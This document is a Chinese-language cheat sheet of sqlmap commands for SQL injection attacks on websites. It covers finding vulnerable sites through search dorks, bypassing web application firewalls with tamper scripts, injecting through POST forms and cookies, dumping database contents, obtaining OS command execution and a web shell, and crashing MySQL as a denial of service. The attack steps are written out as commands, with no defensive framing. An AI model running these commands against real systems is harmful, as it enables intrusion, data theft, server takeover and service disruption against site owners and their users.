绕过WAF防火墙
--tamper
利用sqlmap集成的编码脚本
--privilege
查看注入点权限
Mysql Dos攻击
必须知道一个账号和密码 或者一个shell
攻击语句有很多种需要分析
-g inurl:php?id=
搜索注入点
请求延迟
--delay 隔一段时间访问一个正常页面(秒)
--safe-freq 设置次数或者别的 该项很自由
伪静态注入
xxx.html 改为xxx*.html
加个*符号
交互写shell及命令
--os-cmd 执行命令
--os-shell 得到shell(会写入文件)
post登录框注入
用burpsuite抓一个包
-r 指定文件 -p 指定参数
--forms 搜索表单
--data "name=1241&pass=4434" 指定参数
cookies注入
--cookie "" cookies注入“id=3”(完整的参数式子)
--level 数字 指定等级
别的一样
-C " , "
--dbs 获取数据库
-D 指定数据库
mysql数据库注入
记得指定需要猜解的数据库
-C 指定字段 多个字段用逗号分隔
-u "" 指定url地址
--tables 猜表
--columns 猜字段
-T 指定表名
--dump 猜解内容
看权限,
-g inurl:asp?id=1
使用编码脚本绕过waf,加密payload
--privilege 看权限
sqlmap -u http://xxx --sql-shell
获得一个shell,之后执行sql命令,使数据库报错或者停止,dos
sqlmap -u http://xxx* --dbs
最后加个*
绕过网站的请求保护机制(如限制请求次数、3次后验证请求等)
执行命令:sqlmap -u http://xxx -os-cmd=ipconfig 指定语言、目标站点目录
sqlmap -u http://xxx -os-cmd=shell
之后网站会生成两个临时文件:tmp,可上传shell
burp截sql包后保存为txt